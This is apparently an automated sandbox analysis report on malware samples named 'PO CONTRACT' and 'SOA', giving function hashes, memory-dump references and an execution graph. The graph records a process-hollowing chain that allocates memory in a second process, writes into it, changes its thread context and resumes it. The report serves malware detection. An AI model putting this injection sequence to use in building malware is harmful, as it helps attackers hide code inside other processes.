                                          • Instruction ID: 1f81e7403288d707a81613f52109251339038928a5913d2ea869b33142a1123b
                                          • Opcode Fuzzy Hash: 317212608194b08a8e6c8d9086c05cec9527cbcc69f036e086cc9fe4be99a075
                                          • Instruction Fuzzy Hash: 7932CE71A10219CFCB08EFB9D88869EBBF2FF88200F5585A9D449E7351EF349855CB90
                                          Function 08FF2B00 Relevance: .7, Instructions: 706COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015389486.0000000008FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FF0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8ff0000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0bb3b76c6ab568fd1829e03ea7b2d3d845000b502b0da94d70ff64edced79cdb
                                          • Instruction ID: bf5268f2536c05faad375fb60a74878dd569b213b75d1ceecf2db920faea62b2
                                          • Opcode Fuzzy Hash: 0bb3b76c6ab568fd1829e03ea7b2d3d845000b502b0da94d70ff64edced79cdb
                                          • Instruction Fuzzy Hash: 5342D071A043158FCB09EFB5D84865EBBF2FF89200F1585AAD049EB362DF349855CB91
                                          Function 08F50040 Relevance: .6, Instructions: 558COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015224746.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8f50000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 618d951a738038dec74c81afe4dc663fe4775b20827d16d0be04e305df3e7455
                                          • Instruction ID: 869175d6ebacf490870ebc8db5285ed73c14a919ca41c5bb2a9aa40d80bb0312
                                          • Opcode Fuzzy Hash: 618d951a738038dec74c81afe4dc663fe4775b20827d16d0be04e305df3e7455
                                          • Instruction Fuzzy Hash: 96128970A14219CBCB48BBF8D89966EBBF2FFC8300F518969D449A7344DF38A855C791
                                          Function 02D61300 Relevance: .6, Instructions: 554COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.35999952513.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2d60000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 40884a00c0a67e6e851c98544947ff166b58be7911e9dbc84e2fd80b7479beba
                                          • Instruction ID: f21a77a4197beaec407f06bcf4afa983df466e1c61b24811e4c11d6149796cfc
                                          • Opcode Fuzzy Hash: 40884a00c0a67e6e851c98544947ff166b58be7911e9dbc84e2fd80b7479beba
                                          • Instruction Fuzzy Hash: 78225C75E04119DFCB14CBA8D488ABDB7B2FF88310F248556E44AAB754D734EC82CBA1
                                          Function 08FF94C0 Relevance: .3, Instructions: 298COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015389486.0000000008FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FF0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8ff0000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: df2d8211f4c59393a2dce91d0b896377a829d1c80d435ccddae263ba286048d0
                                          • Instruction ID: 70c05393010095d02929a8f824b47e36a336121673f8fedd3e63c5018ffca98e
                                          • Opcode Fuzzy Hash: df2d8211f4c59393a2dce91d0b896377a829d1c80d435ccddae263ba286048d0
                                          • Instruction Fuzzy Hash: 3BD1B374B00605CFDB18DF69C598BA9BBF1AF88301F2580A9E505AB372DB71AD41CF60
                                          Function 0972BD47 Relevance: .3, Instructions: 272COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36016020124.0000000009720000.00000040.00000800.00020000.00000000.sdmp, Offset: 09720000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9720000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b49cfca6197f919f4f6a82749a6e6de7a1ee25104b66b7756c7a0a4caa0150fb
                                          • Instruction ID: 778f6f0b39fb937c6f9c83d02d7ca87df53e9f4f683387491aaf5fb70cbb289b
                                          • Opcode Fuzzy Hash: b49cfca6197f919f4f6a82749a6e6de7a1ee25104b66b7756c7a0a4caa0150fb
                                          • Instruction Fuzzy Hash: 19D1EC31C2075ADACB15EFA4D960A99B7B2FFD5300F60879AD10977214EF706AC4CB92
                                          Function 0972BD58 Relevance: .3, Instructions: 264COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36016020124.0000000009720000.00000040.00000800.00020000.00000000.sdmp, Offset: 09720000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9720000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a028803583d4935c0ac54252cd23407ac4d3d8b7ce94ac21b2fd2e278eda71ab
                                          • Instruction ID: 0e4eca5612892c8a263736472323f6a10903fa4d57067705b7e5c67b7fc62dc2
                                          • Opcode Fuzzy Hash: a028803583d4935c0ac54252cd23407ac4d3d8b7ce94ac21b2fd2e278eda71ab
                                          • Instruction Fuzzy Hash: 24D1DC31C2075ADACB15EFA4D960A99B7B2FFD5300F50879AD10977214EF706AC4CB92

                                          Execution Graph

                                          Execution Coverage:20.1%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:3.5%
                                          Total number of Nodes:85
                                          Total number of Limit Nodes:6
                                          execution_graph 26318 56c9058 26319 56c905e VirtualProtect 26318->26319 26321 56c90da 26319->26321 26303 a75be50 26304 a75be90 VirtualAllocEx 26303->26304 26306 a75becd 26304->26306 26307 a75cf10 26308 a75d09b 26307->26308 26309 a75cf36 26307->26309 26309->26308 26311 a757868 26309->26311 26312 a75d190 PostMessageW 26311->26312 26313 a75d1fc 26312->26313 26313->26309 26314 a75cbd0 26315 a75cc10 ResumeThread 26314->26315 26317 a75cc41 26315->26317 26322 a75c6c0 26323 a75c708 VirtualProtectEx 26322->26323 26325 a75c746 26323->26325 26326 a75b780 26327 a75b7c5 Wow64GetThreadContext 26326->26327 26329 a75b80d 26327->26329 26330 56c8070 26331 56c8076 26330->26331 26332 56c80c0 26331->26332 26341 a7502e8 26331->26341 26345 a75133c 26331->26345 26350 a750377 26331->26350 26354 a7502a4 26331->26354 26360 a750aea 26331->26360 26364 a750c0a 26331->26364 26368 a75021b 26331->26368 26372 a750ebb 26331->26372 26342 a7502a5 26341->26342 26342->26341 26376 a7527d1 26342->26376 26380 a7527d8 26342->26380 26346 a751345 26345->26346 26348 a7527d1 VirtualProtect 26346->26348 26349 a7527d8 VirtualProtect 26346->26349 26347 a751357 26348->26347 26349->26347 26352 a7527d1 VirtualProtect 26350->26352 26353 a7527d8 VirtualProtect 26350->26353 26351 a75038b 26352->26351 26353->26351 26355 a7502a5 26354->26355 26358 a7527d1 VirtualProtect 26354->26358 26359 a7527d8 VirtualProtect 26354->26359 26356 a7527d1 VirtualProtect 26355->26356 26357 a7527d8 VirtualProtect 26355->26357 26356->26355 26357->26355 26358->26355 26359->26355 26362 a7527d1 VirtualProtect 26360->26362 26363 a7527d8 VirtualProtect 26360->26363 26361 a750afb 26362->26361 26363->26361 26366 a7527d1 VirtualProtect 26364->26366 26367 a7527d8 VirtualProtect 26364->26367 26365 a750c1e 26366->26365 26367->26365 26370 a7527d1 VirtualProtect 26368->26370 26371 a7527d8 VirtualProtect 26368->26371 26369 a75017f 26369->26331 26370->26369 26371->26369 26374 a7527d1 VirtualProtect 26372->26374 26375 a7527d8 VirtualProtect 26372->26375 26373 a750ece 26374->26373 26375->26373 26377 a7527d8 VirtualProtect 26376->26377 26379 a75285a 26377->26379 26379->26342 26381 a752820 VirtualProtect 26380->26381 26382 a75285a 26381->26382 26382->26342 26383 a754048 26385 a75406f 26383->26385 26384 a7540b7 26385->26384 26388 a754a99 26385->26388 26392 a754aa8 26385->26392 26389 a754aa8 26388->26389 26390 a754f0c 26389->26390 26396 a7579d0 26389->26396 26390->26385 26393 a754adb 26392->26393 26394 a754f0c 26393->26394 26395 a7579d0 CreateProcessAsUserW 26393->26395 26394->26385 26395->26393 26397 a7579f7 26396->26397 26398 a757abb 26397->26398 26400 a759cb0 26397->26400 26398->26389 26401 a759d2f CreateProcessAsUserW 26400->26401 26403 a759e30 26401->26403 26404 a75c948 26405 a75c98d Wow64SetThreadContext 26404->26405 26407 a75c9d5 26405->26407 26408 a75c1c8 26409 a75c210 WriteProcessMemory 26408->26409 26411 a75c267 26409->26411

                                          Executed Functions

                                          Function 09170A94 Relevance: 5.6, Instructions: 5564COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 9170a94-9170aa9 1 9170a8e-9170a92 0->1 2 9170aab-9170d08 0->2 1->0 31 9170d0e-9171a35 2->31 32 9172c7b-9172f60 2->32 439 9171d07-9172c73 31->439 440 9171a3b-9171cff 31->440 107 9173ec7-9174ec0 32->107 108 9172f66-9173ebf 32->108 673 91751b6-91751bc 107->673 674 9174ec6-91751ae 107->674 108->107 439->32 440->439 676 91751c4-91751c9 673->676 674->673 678 9175830-917678b 676->678 679 91751cf-9175828 676->679 1060 9176792-91767a8 678->1060 679->678 1063 91767a8 call 9177c30 1060->1063 1064 91767a8 call 9177bfb 1060->1064 1062 91767ae-91767b5 1063->1062 1064->1062
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472007875.0000000009170000.00000040.00000800.00020000.00000000.sdmp, Offset: 09170000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_9170000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 19bec77b8865022d0e15c6b1543d532c3909965a1b6ab37d9bedf93b8cffaf07
                                          • Instruction ID: e27add77aa9a44bed7691ef0148f77b6dd9c0251e5fb602a1df20dd41d9273cf
                                          • Opcode Fuzzy Hash: 19bec77b8865022d0e15c6b1543d532c3909965a1b6ab37d9bedf93b8cffaf07
                                          • Instruction Fuzzy Hash: 2BB32871A01229CBCBA8EF79D99926DBBF2FB89200F4085E9D448A7350DF345D95CF42
                                          Function 013FC8C9 Relevance: 2.2, Instructions: 2223COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37451908530.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_13f0000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 41590edd0d6e87c28ee1c531cc9f28902bd097643ee3e974b09f37fbeb3fb731
                                          • Instruction ID: fd2f6ddab91fca5a4e59ed143ee6b2f76b0c9028ae5bab87a6f4b7dbb681fe9f
                                          • Opcode Fuzzy Hash: 41590edd0d6e87c28ee1c531cc9f28902bd097643ee3e974b09f37fbeb3fb731
                                          • Instruction Fuzzy Hash: 45133974A14226DBDB51DFF8C884B5EB3B5BF48304F518AA9C50DE3744EB38AA80CB55
                                          Function 0A759CB0 Relevance: 1.7, APIs: 1, Instructions: 164processCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2872 a759cb0-a759d3b 2874 a759d46-a759d4d 2872->2874 2875 a759d3d-a759d43 2872->2875 2876 a759d4f-a759d55 2874->2876 2877 a759d58-a759d70 2874->2877 2875->2874 2876->2877 2878 a759d81-a759e2e CreateProcessAsUserW 2877->2878 2879 a759d72-a759d7e 2877->2879 2881 a759e37-a759eb6 2878->2881 2882 a759e30-a759e36 2878->2882 2879->2878 2889 a759ec8-a759ecf 2881->2889 2890 a759eb8-a759ebe 2881->2890 2882->2881 2891 a759ee6 2889->2891 2892 a759ed1-a759ee0 2889->2892 2890->2889 2892->2891
                                          APIs
                                          • CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 0A759E1B
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472588625.000000000A750000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A750000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_a750000_SOA.jbxd
                                          Similarity
                                          • API ID: CreateProcessUser
                                          • String ID:
                                          • API String ID: 2217836671-0
                                          • Opcode ID: 68b48b463376e5268c23a437c36639da534d19bee9899e7202fdc9b813dfc579
                                          • Instruction ID: ab4bda3a2c81b17cf52434c7f8186f2cfd9e9c1c8b888d8f055ad9f215aab602
                                          • Opcode Fuzzy Hash: 68b48b463376e5268c23a437c36639da534d19bee9899e7202fdc9b813dfc579
                                          • Instruction Fuzzy Hash: 0551E771D00229DFDB64CF69C840BDDBBB5BF48310F0584AAE919B7250DB759A89CF60
                                          Function 013F4420 Relevance: 1.0, Instructions: 984COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37451908530.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_13f0000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 80c0f86b24ad745c9870f750e2f75c881c9074ebcc8e5cd203216721e9d756ba
                                          • Instruction ID: a48e7b24cbc1b7d910144db0945c8e96a7b8d46ff880f8af6b10de0b9aec8732
                                          • Opcode Fuzzy Hash: 80c0f86b24ad745c9870f750e2f75c881c9074ebcc8e5cd203216721e9d756ba
                                          • Instruction Fuzzy Hash: 3C924B31A00209DFCB25CF68D584AAEBBF6BF88318F158659E659DB3A1D730EC45CB50
                                          Function 013F37E0 Relevance: .9, Instructions: 901COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37451908530.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_13f0000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4fd64818d5c434051de705915091bddde88731c1b09b69aeeb98788e5b5b23be
                                          • Instruction ID: 58c55580874faf437a00477a619d8d59887d94ee9170a369cbe4fe4ba255296e
                                          • Opcode Fuzzy Hash: 4fd64818d5c434051de705915091bddde88731c1b09b69aeeb98788e5b5b23be
                                          • Instruction Fuzzy Hash: ED727071A002199FDB15CFA9C844AAEBBF6FF88308F14846DEA05AB365DB35DC45CB50
                                          Function 0A75C1C8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2902 a75c1c8-a75c216 2904 a75c226-a75c265 WriteProcessMemory 2902->2904 2905 a75c218-a75c224 2902->2905 2907 a75c267-a75c26d 2904->2907 2908 a75c26e-a75c29e 2904->2908 2905->2904 2907->2908
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0A75C258
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472588625.000000000A750000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A750000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_a750000_SOA.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 95b798d2660f6b5206ae163a42e1170f9487ef78a34b0c8d76512300906f4adf
                                          • Instruction ID: 9f69e10033b218389fc6353084878cb713e310caf525a8af94e1e211774b0460
                                          • Opcode Fuzzy Hash: 95b798d2660f6b5206ae163a42e1170f9487ef78a34b0c8d76512300906f4adf
                                          • Instruction Fuzzy Hash: 992146729003499FCB10CFAAC884BEEBBF5FF48310F10842AE919A7240D7789944CBA4
                                          Function 0A75C948 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2922 a75c948-a75c993 2924 a75c995-a75c9a1 2922->2924 2925 a75c9a3-a75c9d3 Wow64SetThreadContext 2922->2925 2924->2925 2927 a75c9d5-a75c9db 2925->2927 2928 a75c9dc-a75ca0c 2925->2928 2927->2928
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0A75C9C6
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472588625.000000000A750000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A750000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_a750000_SOA.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: c0e93a184c168b6d5ded61052530feed2bfe7b469aac22a8651f888b4d2e9e8d
                                          • Instruction ID: bc944998a448e8744aa734eb74cb4fc2d33e97e38e942ef8ec9f3bc0e9f63d26
                                          • Opcode Fuzzy Hash: c0e93a184c168b6d5ded61052530feed2bfe7b469aac22a8651f888b4d2e9e8d
                                          • Instruction Fuzzy Hash: D52137719003098FCB14DFAAC4847EEBBF4EB88314F54842AD859A7341DB78A945CFA5
                                          Function 0A75B780 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2912 a75b780-a75b7cb 2914 a75b7cd-a75b7d9 2912->2914 2915 a75b7db-a75b80b Wow64GetThreadContext 2912->2915 2914->2915 2917 a75b814-a75b844 2915->2917 2918 a75b80d-a75b813 2915->2918 2918->2917
                                          APIs
                                          • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0A75B7FE
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472588625.000000000A750000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A750000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_a750000_SOA.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 982a80bf939b72b065b2b0e50b60d87d277b58a78b2babbe6c64e5b89650ca48
                                          • Instruction ID: c368835a94d6537622ff2c4c9b64c6063f1fd4719df67e8130d02385ea1906d6
                                          • Opcode Fuzzy Hash: 982a80bf939b72b065b2b0e50b60d87d277b58a78b2babbe6c64e5b89650ca48
                                          • Instruction Fuzzy Hash: 6B2137719002098FCB14CFAAC4847EEBBF4EB88314F54C42AD859A7341D778A945CFA0
                                          Function 0A75C6C0 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2932 a75c6c0-a75c744 VirtualProtectEx 2935 a75c746-a75c74c 2932->2935 2936 a75c74d-a75c77d 2932->2936 2935->2936
                                          APIs
                                          • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 0A75C737
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472588625.000000000A750000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A750000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_a750000_SOA.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: ad1964a63c2300b2dfca7be0d5709971b438aec03a1bda1a47f3da7ad9555397
                                          • Instruction ID: de9cfece805e7414e671e3fdd6f3160ba3f4a8fe040c99bf0241c69db8459889
                                          • Opcode Fuzzy Hash: ad1964a63c2300b2dfca7be0d5709971b438aec03a1bda1a47f3da7ad9555397
                                          • Instruction Fuzzy Hash: 2B213871C002099FCB14CFAAC484BEEBBF4FF48320F50842AD459A7250C778A945CFA1
                                          Function 0A7527D1 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2940 a7527d1-a752858 VirtualProtect 2943 a752861-a752882 2940->2943 2944 a75285a-a752860 2940->2944 2944->2943
                                          APIs
                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0A75284B
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472588625.000000000A750000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A750000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_a750000_SOA.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 9f913180ac8e96fc5bcead62d9d5533a42e52588097b47302a4ffbe68aaad751
                                          • Instruction ID: 3254363d69e67418eecf562f47c7e91830b3f4a38e6f38ad640caea49dc967c1
                                          • Opcode Fuzzy Hash: 9f913180ac8e96fc5bcead62d9d5533a42e52588097b47302a4ffbe68aaad751
                                          • Instruction Fuzzy Hash: 7F21F2B59002499FCB10CF9AC884BDEBBF4FB48320F10842AE858A3351D378A945CFA5
                                          Function 0A7527D8 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0A75284B
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472588625.000000000A750000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A750000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_a750000_SOA.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 56b3e9f4d68d8bf1dec931896318989663769b8a52406320553ca10eb60e0f50
                                          • Instruction ID: 1d56ae8441c67b259cf4cce3fe151aee69dd8667b12c5b11d38c1e56b4d8848f
                                          • Opcode Fuzzy Hash: 56b3e9f4d68d8bf1dec931896318989663769b8a52406320553ca10eb60e0f50
                                          • Instruction Fuzzy Hash: 3521C2B59002499FCB10CF9AC884BDEBBF4FB48320F50842AE858A7251D378A945CFA5
                                          Function 0A75BE50 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A75BEBE
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472588625.000000000A750000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A750000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_a750000_SOA.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: b476d02a1c870f6c0ffa8eaee088678a0bb2b7860f885c9bd570e9498ff39eab
                                          • Instruction ID: 2bc4edd230e4ab83955c44ab4785fdd85d27cf23cabdd05a70061dbbe6d1601f
                                          • Opcode Fuzzy Hash: b476d02a1c870f6c0ffa8eaee088678a0bb2b7860f885c9bd570e9498ff39eab
                                          • Instruction Fuzzy Hash: E3113A728002499FCB14DFAAC844BEFBFF5EF88314F148819E555A7250D775A954CFA0
                                          Function 0A75CBD0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472588625.000000000A750000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A750000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_a750000_SOA.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: d42e4fcde65c23764ef3050cbca737242089c13233b92f5bf514f0195506540c
                                          • Instruction ID: ab0d479871c7b852c36748a1d94ab0e95588ede41adb2d6f48b50a44244487e3
                                          • Opcode Fuzzy Hash: d42e4fcde65c23764ef3050cbca737242089c13233b92f5bf514f0195506540c
                                          • Instruction Fuzzy Hash: E5112871D003488ACB24DFAAC4847DEFFF5EB88324F24841AD459A7350C779A945CFA4
                                          Function 0A757868 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 0A75D1ED
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472588625.000000000A750000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A750000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_a750000_SOA.jbxd
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          • Opcode ID: 6d60c80ba412c6c1f24a0c2d4a1da86ffe31ec9c9d2b17c46e512f68cdff7ed3
                                          • Instruction ID: c2367a1d69be7dbfcb36005d00a207960df55f25cd2fbbb8567a394c30efdac4
                                          • Opcode Fuzzy Hash: 6d60c80ba412c6c1f24a0c2d4a1da86ffe31ec9c9d2b17c46e512f68cdff7ed3
                                          • Instruction Fuzzy Hash: 9911F5B58003489FCB20DF9AC884BDEBFF8FB48310F108419E919A7201D3B5A944CFA5
                                          Function 013FF3F0 Relevance: .8, Instructions: 825COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37451908530.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_13f0000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 23f4f28792042c1b916cd34283ac951618c9bba3c443c9b9ffe88031c0494573
                                          • Instruction ID: 98f8fe6e54dbf0bac817c592bd58581c0535ca4da59cf5ce37a9d401d8ea4354
                                          • Opcode Fuzzy Hash: 23f4f28792042c1b916cd34283ac951618c9bba3c443c9b9ffe88031c0494573
                                          • Instruction Fuzzy Hash: F8724735A10215CFCB15DFB4D884A6EB7B6FF88304F958A68DA4AA7744DB38BC41CB50
                                          Function 013F5F68 Relevance: .8, Instructions: 785COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37451908530.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_13f0000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ef7a69744836ad51bfa2722dfde22525f4e6ebb6d40bd5c8baeefadeffb566c8
                                          • Instruction ID: 20a682ecf3e0acc2c5d53e85a3661b0fa5d5fe66891013cf7ffb38fd51b630b3
                                          • Opcode Fuzzy Hash: ef7a69744836ad51bfa2722dfde22525f4e6ebb6d40bd5c8baeefadeffb566c8
                                          • Instruction Fuzzy Hash: 2B624274A00159CFEB659BB8C850B9EBBB2FF88304F1080ADD106AB7A5DB349D45DF61
                                          Function 09179980 Relevance: .5, Instructions: 518COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472007875.0000000009170000.00000040.00000800.00020000.00000000.sdmp, Offset: 09170000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_9170000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1d7f2d2dfd3fe2f769e49a7c7b1c8325f17cb104a6fb5e980cc39ada26308745
                                          • Instruction ID: 177a0545564523f01d6506f9aff525c90a69ddc6c60ed6dd2efa08cb2ec39352
                                          • Opcode Fuzzy Hash: 1d7f2d2dfd3fe2f769e49a7c7b1c8325f17cb104a6fb5e980cc39ada26308745
                                          • Instruction Fuzzy Hash: CBE17B70B14219CBC748FBB9D99966EBBF1FF88200F4149A8D849A7394DF389C48C791
                                          Function 013F7640 Relevance: .5, Instructions: 516COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37451908530.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_13f0000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2bdd8c7d067a372c5b21df19ef63ce8a1918d6a761a52034f6e7bb640393c8aa
                                          • Instruction ID: 2b1ba3dea3b46c1e8e012147e46c70d87589a08f76b36a60a24b722cbe07b091
                                          • Opcode Fuzzy Hash: 2bdd8c7d067a372c5b21df19ef63ce8a1918d6a761a52034f6e7bb640393c8aa
                                          • Instruction Fuzzy Hash: 5A225234A00219CFDB64DB79C854B6D77B2BB84349F6084ADD50AAB394DF349D85CF60
                                          Function 0917A172 Relevance: .5, Instructions: 464COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472007875.0000000009170000.00000040.00000800.00020000.00000000.sdmp, Offset: 09170000, based on PE: false
                                          Joe Sandbox IDA Plugin
